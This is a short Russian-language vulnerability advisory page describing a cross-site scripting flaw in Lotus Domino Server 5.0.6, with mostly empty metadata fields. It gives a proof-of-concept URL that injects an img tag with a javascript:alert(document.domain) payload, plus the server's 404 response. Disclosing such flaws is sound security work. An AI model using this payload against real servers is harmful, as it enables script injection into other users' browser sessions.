уязвимость cross-site scripting в Lotus Domino Server 5.0.6

Дата публикации:
02.07.2001
Дата изменения:
17.10.2006
Всего просмотров:
1150
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

Для исполнения Java кода на сервере наберите следующий URL:

http://www.lotus.com/home.nsf/<img%20src=javascript:alert(document.domain)>



В результате чего сервер выдаст:

Error 404

HTTP Web Server: Couldn't find design note - ******
 


или введите имя

CAPTCHA